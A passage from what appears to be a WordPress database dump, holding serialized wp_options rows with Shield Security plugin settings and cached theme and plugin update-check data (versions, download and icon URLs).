s-bootstrap\";i:3;s:22:\"datatables-searchpanes\";i:4;s:14:\"tp/highlightjs\";}}s:15:\"shield/scanners\";a:1:{s:4:\"deps\";a:1:{i:0;s:17:\"shield/scantables\";}}s:17:\"shield/scantables\";a:1:{s:4:\"deps\";a:4:{i:0;s:17:\"datatables-select\";i:1;s:18:\"datatables-buttons\";i:2;s:20:\"datatables-bootstrap\";i:3;s:14:\"tp/highlightjs\";}}s:12:\"shield/tours\";a:1:{s:4:\"deps\";a:2:{i:0;s:6:\"plugin\";i:1;s:7:\"introjs\";}}s:13:\"shield/notbot\";a:0:{}s:12:\"shield/scans\";a:1:{s:4:\"deps\";a:1:{i:0;s:13:\"shield/tables\";}}s:13:\"shield/import\";a:1:{s:4:\"deps\";a:1:{i:0;s:6:\"plugin\";}}s:16:\"shield/ipanalyse\";a:1:{s:4:\"deps\";a:1:{i:0;s:6:\"plugin\";}}s:23:\"shield/mainwp-extension\";a:1:{s:4:\"deps\";a:1:{i:0;s:9:\"wp-jquery\";}}s:18:\"shield/userprofile\";a:2:{s:4:\"deps\";a:2:{i:0;s:10:\"u2f-bundle\";i:1;s:13:\"shield/dialog\";}s:6:\"footer\";b:1;}s:13:\"shield/wizard\";a:1:{s:4:\"deps\";a:3:{i:0;s:9:\"bootstrap\";i:1;s:13:\"global-plugin\";i:2;s:12:\"jquery/steps\";}}s:10:\"u2f-bundle\";a:0:{}s:13:\"tp/grecaptcha\";a:2:{s:3:\"url\";s:39:\"https://www.google.com/recaptcha/api.js\";s:10:\"attributes\";a:2:{s:5:\"async\";s:5:\"async\";s:5:\"defer\";s:5:\"defer\";}}s:11:\"tp/hcaptcha\";a:2:{s:3:\"url\";s:29:\"https://hcaptcha.com/1/api.js\";s:10:\"attributes\";a:2:{s:5:\"async\";s:5:\"async\";s:5:\"defer\";s:5:\"defer\";}}s:14:\"tp/highlightjs\";a:1:{s:3:\"url\";s:75:\"https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.1.0/highlight.min.js\";}}}}s:4:\"menu\";a:6:{s:4:\"show\";b:1;s:5:\"title\";s:15:\"Shield Security\";s:9:\"top_level\";b:1;s:14:\"do_submenu_fix\";b:1;s:10:\"icon_image\";s:20:\"pluginlogo_16x16.png\";s:11:\"has_submenu\";b:1;}s:6:\"labels\";a:10:{s:4:\"Name\";s:15:\"Shield Security\";s:11:\"Description\";s:108:\"Ultimate WP Security Protection - Scans, 2FA, Firewall, SPAM, Audit Trail, Security Admin, and so much more.\";s:5:\"Title\";s:15:\"Shield Security\";s:6:\"Author\";s:15:\"Shield Security\";s:10:\"AuthorName\";s:15:\"Shield Security\";s:9:\"PluginURI\";s:19:\"https://shsec.io/2f\";s:9:\"AuthorURI\";s:19:\"https://shsec.io/bv\";s:14:\"icon_url_16x16\";s:20:\"pluginlogo_16x16.png\";s:14:\"icon_url_32x32\";s:20:\"pluginlogo_32x32.png\";s:16:\"icon_url_128x128\";s:22:\"pluginlogo_128x128.png\";}s:4:\"meta\";a:3:{s:13:\"url_repo_home\";s:19:\"https://shsec.io/eh\";s:24:\"announcekit_changelog_id\";s:6:\"3ObUvS\";s:19:\"privacy_policy_href\";s:36:\"https://shsec.io/shieldprivacypolicy\";}s:11:\"plugin_meta\";a:1:{i:0;a:2:{s:4:\"name\";s:26:\"5&#10025; Rate This Plugin\";s:4:\"href\";s:23:\"https://shsec.io/wpsf29\";}}s:16:\"version_upgrades\";a:5:{i:0;s:6:\"10.1.0\";i:1;s:6:\"10.2.1\";i:2;s:6:\"11.2.0\";i:3;s:6:\"12.0.0\";i:4;s:6:\"12.0.1\";}s:12:\"action_links\";a:2:{s:6:\"remove\";N;s:3:\"add\";a:2:{i:0;a:5:{s:4:\"name\";s:18:\"Security Dashboard\";s:5:\"title\";s:24:\"Go To Security Dashboard\";s:4:\"href\";s:26:\"getPluginUrl_DashboardHome\";s:6:\"target\";s:4:\"_top\";s:4:\"show\";s:6:\"always\";}i:1;a:6:{s:4:\"name\";s:20:\"&uarr; Go Pro &uarr;\";s:5:\"title\";s:29:\"Get All PRO Security Features\";s:4:\"href\";s:19:\"https://shsec.io/d8\";s:6:\"target\";s:6:\"_blank\";s:9:\"highlight\";b:1;s:4:\"show\";s:4:\"free\";}}}s:16:\"previous_version\";s:6:\"12.0.3\";s:4:\"hash\";s:40:\"2d63b5c31c329c837fdc786f661b6587a2eb261f\";s:21:\"update_first_detected\";a:1:{s:6:\"12.0.4\";i:1632328151;}}','no'),(510497,'_transient_w3tc.verify_plugins','1','no'),(511099,'_site_transient_timeout_apto-db-ready-922cea4581','1632334412','no'),(511100,'_site_transient_apto-db-ready-922cea4581','1','no'),(511101,'_site_transient_timeout_apto-db-ready-b390480cda','1632334412','no'),(511102,'_site_transient_apto-db-ready-b390480cda','1','no'),(509636,'_site_transient_timeout_php_check_b18180942574278ff67528037bdd7ba9','1632679608','no'),(509637,'_site_transient_php_check_b18180942574278ff67528037bdd7ba9','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(510973,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1632328153;s:7:\"checked\";a:5:{s:15:\"LambdaGammaZeta\";s:3:\"1.0\";s:7:\"hopeful\";s:5:\"1.1.2\";s:14:\"twentynineteen\";s:3:\"1.5\";s:12:\"twentytwenty\";s:3:\"1.2\";s:15:\"twentytwentyone\";s:3:\"1.0\";}s:8:\"response\";a:3:{s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.1.zip\";s:8:\"requires\";s:5:\"4.9.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"twentytwenty\";a:6:{s:5:\"theme\";s:12:\"twentytwenty\";s:11:\"new_version\";s:3:\"1.8\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.8.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.4.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(510974,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1632332519;s:8:\"response\";a:1:{s:32:\"wp-simple-firewall/icwp-wpsf.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:32:\"w.org/plugins/wp-simple-firewall\";s:4:\"slug\";s:18:\"wp-simple-firewall\";s:6:\"plugin\";s:32:\"wp-simple-firewall/icwp-wpsf.php\";s:11:\"new_version\";s:6:\"12.0.4\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/wp-simple-firewall/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/wp-simple-firewall.12.0.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/wp-simple-firewall/assets/icon-256x256.png?rev=2475382\";s:2:\"1x\";s:71:\"https://ps.w.org/wp-simple-firewall/assets/icon-128x128.png?rev=2475382\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/wp-simple-firewall/assets/banner-1544x500.png?rev=2472340\";s:2:\"1x\";s:73:\"https://ps.w.org/wp-simple-firewall/assets/banner-772x250.png?rev=2472340\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.7\";s:6:\"tested\";s:5:\"5.8.1\";s:12:\"requires_php\";s:3:\"7.0\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:22:{s:41:\"admin-custom-login/admin-custom-login.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:32:\"w.org/plugins/admin-custom-login\";s:4:\"slug\";s:18:\"admin-custom-login\";s:6:\"plugin\";s:41:\"admin-custom-login/admin-custom-login.php\";s:11:\"new_version\";s:5:\"3.2.9\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/admin-custom-login/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/admin-custom-login.3.2.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/admin-custom-login/assets/icon-256x256.png?rev=1121656\";s:2:\"1x\";s:71:\"https://ps.w.org/admin-custom-login/assets/icon-128x128.png?rev=1121656\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/admin-custom-login/assets/banner-772x250.jpg?rev=1121656\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:6:\"4.1.12\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/akismet.4.1.12.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.48\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.48.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2601679\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2601679\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:16:\"gotmls/index.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:20:\"w.org/plugins/gotmls\";s:4:\"slug\";s:6:\"gotmls\";s:6:\"plugin\";s:16:\"gotmls/index.php\";s:11:\"new_version\";s:7:\"4.20.72\";s:3:\"url\";s:37:\"https://wordpress.org/plugins/gotmls/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/gotmls.4.20.72.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/gotmls/assets/icon-256x256.png?rev=1001824\";s:2:\"1x\";s:59:\"https://ps.w.org/gotmls/assets/icon-128x128.png?rev=1001824\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/gotmls/assets/banner-772x250.jpg?rev=1043954\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:33:\"classic-editor/classic-editor.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/classic-editor\";s:4:\"slug\";s:14:\"classic-editor\";s:6:\"plugin\";s:33:\"classic-editor/classic-editor.php\";s:11:\"new_version\";s:5:\"1.6.2\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/classic-editor.1.6.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-256x256.png?rev=1998671\";s:2:\"1x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-128x128.png?rev=1998671\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/classic-editor/assets/banner-1544x500.png?rev=1998671\";s:2:\"1x\";s:69:\"https://ps.w.org/classic-editor/assets/banner-772x250.png?rev=1998676\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.4.2\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.4.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:67:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=2279696\";s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";}s:25:\"duplicator/duplicator.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/duplicator\";s:4:\"slug\";s:10:\"duplicator\";s:6:\"plugin\";s:25:\"duplicator/duplicator.php\";s:11:\"new_version\";s:5:\"1.4.3\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/duplicator/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/duplicator.1.4.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/duplicator/assets/icon-256x256.png?rev=2083921\";s:2:\"1x\";s:63:\"https://ps.w.org/duplicator/assets/icon-128x128.png?rev=2083921\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/duplicator/assets/banner-772x250.png?rev=2085472\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:27:\"wordpress-popup/popover.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/wordpress-popup\";s:4:\"slug\";s:15:\"wordpress-popup\";s:6:\"plugin\";s:27:\"wordpress-popup/popover.php\";s:11:\"new_version\";s:7:\"7.4.5.2\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wordpress-popup/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/wordpress-popup.7.4.5.2.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-popup/assets/icon-128x128.gif?rev=2459217\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/wordpress-popup/assets/banner-1544x500.png?rev=2369052\";s:2:\"1x\";s:70:\"https://ps.w.org/wordpress-popup/assets/banner-772x250.png?rev=2369052\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.2\";}s:53:\"import-eventbrite-events/import-eventbrite-events.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:38:\"w.org/plugins/import-eventbrite-events\";s:4:\"slug\";s:24:\"import-eventbrite-events\";s:6:\"plugin\";s:53:\"import-eventbrite-events/import-eventbrite-events.php\";s:11:\"new_version\";s:5:\"1.6.2\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/import-eventbrite-events/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/import-eventbrite-events.1.6.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/import-eventbrite-events/assets/icon-256x256.png?rev=2542744\";s:2:\"1x\";s:77:\"https://ps.w.org/import-eventbrite-events/assets/icon-128x128.png?rev=2542744\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/import-eventbrite-events/assets/banner-1544x500.png?rev=2542744\";s:2:\"1x\";s:79:\"https://ps.w.org/import-eventbrite-events/assets/banner-772x250.png?rev=2542744\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:41:\"better-wp-security/better-wp-security.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:32:\"w.org/plugins/better-wp-security\";s:4:\"slug\";s:18:\"better-wp-security\";s:6:\"plugin\";s:41:\"better-wp-security/better-wp-security.php\";s:11:\"new_version\";s:5:\"8.0.2\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/better-wp-security/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/better-wp-security.8.0.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:70:\"https://ps.w.org/better-wp-security/assets/icon-256x256.jpg?rev=969999\";s:2:\"1x\";s:62:\"https://ps.w.org/better-wp-security/assets/icon.svg?rev=970042\";s:3:\"svg\";s:62:\"https://ps.w.org/better-wp-security/assets/icon.svg?rev=970042\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/better-wp-security/assets/banner-772x250.png?rev=2581716\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.7\";s:6:\"tested\";s:5:\"5.8.1\";s:12:\"requires_php\";s:3:\"7.0\";s:13:\"compatibility\";a:0:{}s:14:\"upgrade_notice\";s:130:\"<p>Version 8.0.0 is a major new release for iThemes Security with a brand new user interface and new features like Two-Factor.</p>\";}s:19:\"keyring/keyring.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/keyring\";s:4:\"slug\";s:7:\"keyring\";s:6:\"plugin\";s:19:\"keyring/keyring.php\";s:11:\"new_version\";s:3:\"3.0\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/keyring/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/keyring.3.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/keyring/assets/icon-256x256.png?rev=1824013\";s:2:\"1x\";s:60:\"https://ps.w.org/keyring/assets/icon-256x256.png?rev=1824013\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/keyring/assets/banner-772x250.png?rev=520549\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:30:\"login-sidebar-widget/login.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/login-sidebar-widget\";s:4:\"slug\";s:20:\"login-sidebar-widget\";s:6:\"plugin\";s:30:\"login-sidebar-widget/login.php\";s:11:\"new_version\";s:5:\"6.0.9\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/login-sidebar-widget/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/login-sidebar-widget.6.0.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/login-sidebar-widget/assets/icon-256x256.png?rev=2067421\";s:2:\"1x\";s:73:\"https://ps.w.org/login-sidebar-widget/assets/icon-128x128.png?rev=2067421\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/login-sidebar-widget/assets/banner-772x250.png?rev=948931\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"2.0.2\";}s:52:\"mailchimp-forms-by-mailmunch/mailchimp-mailmunch.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:42:\"w.org/plugins/mailchimp-forms-by-mailmunch\";s:4:\"slug\";s:28:\"mailchimp-forms-by-mailmunch\";s:6:\"plugin\";s:52:\"mailchimp-forms-by-mailmunch/mailchimp-mailmunch.php\";s:11:\"new_version\";s:5:\"3.1.4\";s:3:\"url\";s:59:\"https://wordpress.org/plugins/mailchimp-forms-by-mailmunch/\";s:7:\"package\";s:77:\"https://downloads.wordpress.org/plugin/mailchimp-forms-by-mailmunch.3.1.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:81:\"https://ps.w.org/mailchimp-forms-by-mailmunch/assets/icon-256x256.png?rev=2277879\";s:2:\"1x\";s:81:\"https://ps.w.org/mailchimp-forms-by-mailmunch/assets/icon-128x128.png?rev=2277879\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:84:\"https://ps.w.org/mailchimp-forms-by-mailmunch/assets/banner-1544x500.png?rev=1008181\";s:2:\"1x\";s:83:\"https://ps.w.org/mailchimp-forms-by-mailmunch/assets/banner-772x250.png?rev=1008181\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:43:\"gf-form-multicolumn/gf-form-multicolumn.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:33:\"w.org/plugins/gf-form-multicolumn\";s:4:\"slug\";s:19:\"gf-form-multicolumn\";s:6:\"plugin\";s:43:\"gf-form-multicolumn/gf-form-multicolumn.php\";s:11:\"new_version\";s:5:\"3.2.1\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/gf-form-multicolumn/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/gf-form-multicolumn.3.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/gf-form-multicolumn/assets/icon-256x256.png?rev=1497218\";s:2:\"1x\";s:72:\"https://ps.w.org/gf-form-multicolumn/assets/icon-128x128.png?rev=1497218\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/gf-form-multicolumn/assets/banner-772x250.png?rev=1497218\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:27:\"ninja-forms/ninja-forms.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/ninja-forms\";s:4:\"slug\";s:11:\"ninja-forms\";s:6:\"plugin\";s:27:\"ninja-forms/ninja-forms.php\";s:11:\"new_version\";s:7:\"3.5.8.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/ninja-forms/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/ninja-forms.3.5.8.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/ninja-forms/assets/icon-256x256.png?rev=1649747\";s:2:\"1x\";s:64:\"https://ps.w.org/ninja-forms/assets/icon-128x128.png?rev=1649747\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/ninja-forms/assets/banner-1544x500.png?rev=2069024\";s:2:\"1x\";s:66:\"https://ps.w.org/ninja-forms/assets/banner-772x250.png?rev=2069024\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";}s:35:\"obfuscate-email/obfuscate-email.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/obfuscate-email\";s:4:\"slug\";s:15:\"obfuscate-email\";s:6:\"plugin\";s:35:\"obfuscate-email/obfuscate-email.php\";s:11:\"new_version\";s:5:\"3.8.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/obfuscate-email/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/obfuscate-email.3.8.1.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/obfuscate-email/assets/icon-128x128.png?rev=1103859\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/obfuscate-email/assets/banner-772x250.png?rev=773561\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";}s:21:\"raw-html/raw_html.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:22:\"w.org/plugins/raw-html\";s:4:\"slug\";s:8:\"raw-html\";s:6:\"plugin\";s:21:\"raw-html/raw_html.php\";s:11:\"new_version\";s:5:\"1.6.3\";s:3:\"url\";s:39:\"https://wordpress.org/plugins/raw-html/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/raw-html.1.6.3.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:52:\"https://s.w.org/plugins/geopattern-icon/raw-html.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"2.8\";}s:69:\"styles-and-layouts-for-gravity-forms/styles-layouts-gravity-forms.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:50:\"w.org/plugins/styles-and-layouts-for-gravity-forms\";s:4:\"slug\";s:36:\"styles-and-layouts-for-gravity-forms\";s:6:\"plugin\";s:69:\"styles-and-layouts-for-gravity-forms/styles-layouts-gravity-forms.php\";s:11:\"new_version\";s:5:\"4.3.3\";s:3:\"url\";s:67:\"https://wordpress.org/plugins/styles-and-layouts-for-gravity-forms/\";s:7:\"package\";s:85:\"https://downloads.wordpress.org/plugin/styles-and-layouts-for-gravity-forms.4.3.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:89:\"https://ps.w.org/styles-and-layouts-for-gravity-forms/assets/icon-256x256.png?rev=1352290\";s:2:\"1x\";s:89:\"https://ps.w.org/styles-and-layouts-for-gravity-forms/assets/icon-128x128.png?rev=1352290\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:92:\"https://ps.w.org/styles-and-layouts-for-gravity-forms/assets/banner-1544x500.jpg?rev=1352285\";s:2:\"1x\";s:91:\"https://ps.w.org/styles-and-layouts-for-gravity-forms/assets/banner-772x250.jpg?rev=1352285\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:33:\"theme-my-login/theme-my-login.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/theme-my-login\";s:4:\"slug\";s:14:\"theme-my-login\";s:6:\"plugin\";s:33:\"theme-my-login/theme-my-login.php\";s:11:\"new_version\";s:5:\"7.1.3\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/theme-my-login/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/theme-my-login.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/theme-my-login/assets/icon-256x256.png?rev=1891232\";s:2:\"1x\";s:67:\"https://ps.w.org/theme-my-login/assets/icon-128x128.png?rev=1891232\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/theme-my-login/assets/banner-1544x500.png?rev=1891232\";s:2:\"1x\";s:69:\"https://ps.w.org/theme-my-login/assets/banner-772x250.png?rev=1891232\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.4\";}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:7:\"1.16.61\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/updraftplus.1.16.61.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.2\";}s:33:\"w3-total-cache/w3-total-cache.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/w3-total-cache\";s:4:\"slug\";s:14:\"w3-total-cache\";s:6:\"plugin\";s:33:\"w3-total-cache/w3-total-cache.php\";s:11:\"new_version\";s:5:\"2.1.8\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/w3-total-cache/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/w3-total-cache.2.1.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/w3-total-cache/assets/icon-256x256.png?rev=1041806\";s:2:\"1x\";s:67:\"https://ps.w.org/w3-total-cache/assets/icon-128x128.png?rev=1041806\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/w3-total-cache/assets/banner-772x250.jpg?rev=1041806\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.8\";}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"17.2\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"http